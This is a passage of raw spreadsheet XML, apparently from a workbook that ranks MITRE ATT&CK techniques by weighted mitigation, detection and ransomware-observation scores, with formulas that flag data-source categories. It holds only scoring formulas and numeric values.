        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT503" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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04" spans="1:47" ht="34">
      <c r="A504" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B504" s="37">
        <f t="shared" si="7"/>
        <v>705.1138092857143</v>
      </c>
      <c r="C504" s="37" t="s">
        <v>1756</v>
      </c>
      <c r="D504" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E504" s="37" t="s">
        <v>1757</v>
      </c>
      <c r="F504" s="37">
        <v>1</v>
      </c>
      <c r="G504" s="37">
        <v>1</v>
      </c>
      <c r="H504" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I504" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J504" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K504" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L504" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M504" s="37">
        <v>0</v>
      </c>
      <c r="N504" s="56">
        <v>2</v>
      </c>
      <c r="O504" s="56">
        <v>0</v>
      </c>
      <c r="P504" s="56">
        <v>1</v>
      </c>
      <c r="Q504" s="56">
        <v>0</v>
      </c>
      <c r="R504" s="57" t="s">
        <v>1751</v>
      </c>
      <c r="S504" s="57">
        <v>9</v>
      </c>
      <c r="T504" s="57" t="s">
        <v>1752</v>
      </c>
      <c r="U504" s="57">
        <v>16</v>
      </c>
      <c r="V504" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.25238071428571429</v>
      </c>
      <c r="W504" s="37">
        <v>25</v>
      </c>
      <c r="X504" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y504" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z504" s="37">
        <v>3</v>
      </c>
      <c r="AA504" s="37">
        <v>0.03</v>
      </c>
      <c r="AB504" s="37">
        <v>0.03</v>
      </c>
      <c r="AC504" s="37"/>
      <c r="AD504" s="50" t="s">
        <v>1308</v>
      </c>
      <c r="AE504" s="37" t="str" cm="1">
        <f t="array" ref="AE504">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD504)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF504" s="37">
        <v>500</v>
      </c>
      <c r="AG504" s="37" t="str" cm="1">
        <f t="array" ref="AG504">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD504)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH504" s="37">
        <v>500</v>
      </c>
      <c r="AI504" s="37" t="str" cm="1">
        <f t="array" ref="AI504">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD504)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ504" s="37">
        <v>500</v>
      </c>
      <c r="AK504" s="37" t="str" cm="1">
        <f t="array" ref="AK504">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD504)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL504" s="37">
        <v>500</v>
      </c>
      <c r="AM504" s="37" t="str" cm="1">
        <f t="array" ref="AM504">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD504)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN504" s="37">
        <v>0</v>
      </c>
      <c r="AO504" s="37">
        <v>0</v>
      </c>
      <c r="AP504" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ504" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>235.03793642857144</v>
      </c>
      <c r="AR504" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS504" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT504" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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05" spans="1:47" ht="34">
      <c r="A505" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B505" s="37">
        <f t="shared" si="7"/>
        <v>763.80952380952374</v>
      </c>
      <c r="C505" s="37" t="s">
        <v>1758</v>
      </c>
      <c r="D505" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E505" s="37" t="s">
        <v>1759</v>
      </c>
      <c r="F505" s="37">
        <v>1</v>
      </c>
      <c r="G505" s="37">
        <v>1</v>
      </c>
      <c r="H505" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I505" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J505" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K505" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L505" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M505" s="37">
        <v>0</v>
      </c>
      <c r="N505" s="56">
        <v>4</v>
      </c>
      <c r="O505" s="56">
        <v>9</v>
      </c>
      <c r="P505" s="56">
        <v>0</v>
      </c>
      <c r="Q505" s="56">
        <v>2</v>
      </c>
      <c r="R505" s="57" t="s">
        <v>1742</v>
      </c>
      <c r="S505" s="57">
        <v>10</v>
      </c>
      <c r="T505" s="57" t="s">
        <v>1743</v>
      </c>
      <c r="U505" s="57">
        <v>12</v>
      </c>
      <c r="V505" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.28095238095238095</v>
      </c>
      <c r="W505" s="37">
        <v>22</v>
      </c>
      <c r="X505" s="37">
        <v>0.4</v>
      </c>
      <c r="Y505" s="37">
        <v>0.4</v>
      </c>
      <c r="Z505" s="37">
        <v>15</v>
      </c>
      <c r="AA505" s="37">
        <v>0.15</v>
      </c>
      <c r="AB505" s="37">
        <v>0.15</v>
      </c>
      <c r="AC505" s="37"/>
      <c r="AD505" s="50" t="s">
        <v>1760</v>
      </c>
      <c r="AE505" s="37" t="str" cm="1">
        <f t="array" ref="AE505">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD505)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF505" s="37">
        <v>501</v>
      </c>
      <c r="AG505" s="37" t="str" cm="1">
        <f t="array" ref="AG505">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD505)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH505" s="37">
        <v>501</v>
      </c>
      <c r="AI505" s="37" t="str" cm="1">
        <f t="array" ref="AI505">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD505)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ505" s="37">
        <v>501</v>
      </c>
      <c r="AK505" s="37" t="str" cm="1">
        <f t="array" ref="AK505">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD505)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL505" s="37">
        <v>501</v>
      </c>
      <c r="AM505" s="37" t="str" cm="1">
        <f t="array" ref="AM505">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD505)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN505" s="37">
        <v>0</v>
      </c>
      <c r="AO505" s="37">
        <v>0</v>
      </c>
      <c r="AP505" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ505" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>254.60317460317458</v>
      </c>
      <c r="AR505" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS505" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT505" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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06" spans="1:47" ht="51">
      <c r="A506" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B506" s="37">
        <f t="shared" si="7"/>
        <v>277.43285500000007</v>
      </c>
      <c r="C506" s="37" t="s">
        <v>1761</v>
      </c>
      <c r="D506" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E506" s="37" t="s">
        <v>1762</v>
      </c>
      <c r="F506" s="37">
        <v>1</v>
      </c>
      <c r="G506" s="37">
        <v>1</v>
      </c>
      <c r="H506" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I506" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J506" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K506" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L506" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M506" s="37">
        <v>0</v>
      </c>
      <c r="N506" s="56">
        <v>0</v>
      </c>
      <c r="O506" s="56">
        <v>2</v>
      </c>
      <c r="P506" s="56">
        <v>0</v>
      </c>
      <c r="Q506" s="56">
        <v>0</v>
      </c>
      <c r="R506" s="57">
        <v>4.0999999999999996</v>
      </c>
      <c r="S506" s="57">
        <v>1</v>
      </c>
      <c r="T506" s="57" t="s">
        <v>1763</v>
      </c>
      <c r="U506" s="57">
        <v>2</v>
      </c>
      <c r="V506" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.8095000000000004E-2</v>
      </c>
      <c r="W506" s="37">
        <v>3</v>
      </c>
      <c r="X506" s="37">
        <v>5.4545000000000003E-2</v>
      </c>
      <c r="Y506" s="37">
        <v>5.4545000000000003E-2</v>
      </c>
      <c r="Z506" s="37">
        <v>2</v>
      </c>
      <c r="AA506" s="37">
        <v>0.02</v>
      </c>
      <c r="AB506" s="37">
        <v>0.02</v>
      </c>
      <c r="AC506" s="37"/>
      <c r="AD506" s="50" t="s">
        <v>1764</v>
      </c>
      <c r="AE506" s="37" t="str" cm="1">
        <f t="array" ref="AE506">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD506)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF506" s="37">
        <v>502</v>
      </c>
      <c r="AG506" s="37" t="str" cm="1">
        <f t="array" ref="AG506">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD506)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH506" s="37">
        <v>502</v>
      </c>
      <c r="AI506" s="37" t="str" cm="1">
        <f t="array" ref="AI506">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD506)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ506" s="37">
        <v>502</v>
      </c>
      <c r="AK506" s="37" t="str" cm="1">
        <f t="array" ref="AK506">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD506)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL506" s="37">
        <v>502</v>
      </c>
      <c r="AM506" s="37" t="str" cm="1">
        <f t="array" ref="AM506">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD506)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN506" s="37">
        <v>0</v>
      </c>
      <c r="AO506" s="37">
        <v>0</v>
      </c>
      <c r="AP506" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ506" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>92.477618333333353</v>
      </c>
      <c r="AR506" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS506" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT506" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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07" spans="1:47" ht="51">
      <c r="A507" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B507" s="37">
        <f t="shared" si="7"/>
        <v>546.3860018571429</v>
      </c>
      <c r="C507" s="37" t="s">
        <v>1765</v>
      </c>
      <c r="D507" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E507" s="37" t="s">
        <v>1766</v>
      </c>
      <c r="F507" s="37">
        <v>1</v>
      </c>
      <c r="G507" s="37">
        <v>1</v>
      </c>
      <c r="H507" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I507" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J507" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K507" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L507" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M507" s="37">
        <v>0</v>
      </c>
      <c r="N507" s="56">
        <v>0</v>
      </c>
      <c r="O507" s="56">
        <v>0</v>
      </c>
      <c r="P507" s="56">
        <v>0</v>
      </c>
      <c r="Q507" s="56">
        <v>0</v>
      </c>
      <c r="R507" s="57" t="s">
        <v>1767</v>
      </c>
      <c r="S507" s="57">
        <v>9</v>
      </c>
      <c r="T507" s="57" t="s">
        <v>1768</v>
      </c>
      <c r="U507" s="57">
        <v>9</v>
      </c>
      <c r="V507" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.1714287142857143</v>
      </c>
      <c r="W507" s="37">
        <v>18</v>
      </c>
      <c r="X507" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y507" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z507" s="37">
        <v>0</v>
      </c>
      <c r="AA507" s="37">
        <v>0</v>
      </c>
      <c r="AB507" s="37">
        <v>0</v>
      </c>
      <c r="AC507" s="37"/>
      <c r="AD507" s="50" t="s">
        <v>1241</v>
      </c>
      <c r="AE507" s="37" t="str" cm="1">
        <f t="array" ref="AE507">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD507)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF507" s="37">
        <v>503</v>
      </c>
      <c r="AG507" s="37" t="str" cm="1">
        <f t="array" ref="AG507">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD507)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH507" s="37">
        <v>503</v>
      </c>
      <c r="AI507" s="37" t="str" cm="1">
        <f t="array" ref="AI507">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD507)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ507" s="37">
        <v>503</v>
      </c>
      <c r="AK507" s="37" t="str" cm="1">
        <f t="array" ref="AK507">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD507)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL507" s="37">
        <v>503</v>
      </c>
      <c r="AM507" s="37" t="str" cm="1">
        <f t="array" ref="AM507">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD507)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN507" s="37">
        <v>0</v>
      </c>
      <c r="AO507" s="37">
        <v>0</v>
      </c>
      <c r="AP507" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ507" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>182.1286672857143</v>
      </c>
      <c r="AR507" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS507" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT507" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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08" spans="1:47" ht="17">
      <c r="A508" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B508" s="37">
        <f t="shared" si="7"/>
        <v>230.51428571428573</v>
      </c>
      <c r="C508" s="37" t="s">
        <v>1769</v>
      </c>
      <c r="D508" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E508" s="37" t="s">
        <v>1770</v>
      </c>
      <c r="F508" s="37">
        <v>1</v>
      </c>
      <c r="G508" s="37">
        <v>1</v>
      </c>
      <c r="H508" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I508" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J508" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K508" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L508" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M508" s="37">
        <v>0</v>
      </c>
      <c r="N508" s="56">
        <v>0</v>
      </c>
      <c r="O508" s="56">
        <v>1</v>
      </c>
      <c r="P508" s="56">
        <v>2</v>
      </c>
      <c r="Q508" s="56">
        <v>0</v>
      </c>
      <c r="R508" s="57"/>
      <c r="S508" s="57"/>
      <c r="T508" s="57"/>
      <c r="U508" s="57"/>
      <c r="V508" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W508" s="37">
        <v>0</v>
      </c>
      <c r="X508" s="37">
        <v>0</v>
      </c>
      <c r="Y508" s="37">
        <v>0</v>
      </c>
      <c r="Z508" s="37">
        <v>3</v>
      </c>
      <c r="AA508" s="37">
        <v>0.03</v>
      </c>
      <c r="AB508" s="37">
        <v>0.03</v>
      </c>
      <c r="AC508" s="37"/>
      <c r="AD508" s="50" t="s">
        <v>396</v>
      </c>
      <c r="AE508" s="37" t="str" cm="1">
        <f t="array" ref="AE508">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD508)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF508" s="37">
        <v>504</v>
      </c>
      <c r="AG508" s="37" t="str" cm="1">
        <f t="array" ref="AG508">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD508)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH508" s="37">
        <v>504</v>
      </c>
      <c r="AI508" s="37" t="str" cm="1">
        <f t="array" ref="AI508">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD508)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ508" s="37">
        <v>504</v>
      </c>
      <c r="AK508" s="37" t="str" cm="1">
        <f t="array" ref="AK508">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD508)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL508" s="37">
        <v>504</v>
      </c>
      <c r="AM508" s="37" t="str" cm="1">
        <f t="array" ref="AM508">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD508)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN508" s="37">
        <v>0</v>
      </c>
      <c r="AO508" s="37"/>
      <c r="AP508" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ508" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>76.838095238095249</v>
      </c>
      <c r="AR508" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS508" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT508" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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09" spans="1:47" ht="136">
      <c r="A509" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B509" s="37">
        <f t="shared" si="7"/>
        <v>567.8052430952381</v>
      </c>
      <c r="C509" s="37" t="s">
        <v>1771</v>
      </c>
      <c r="D509" s="50" t="s">
        <v>1772</v>
      </c>
      <c r="E509" s="37"/>
      <c r="F509" s="37">
        <v>1</v>
      </c>
      <c r="G509" s="37">
        <v>1</v>
      </c>
      <c r="H509" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I509" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J509" s="37">
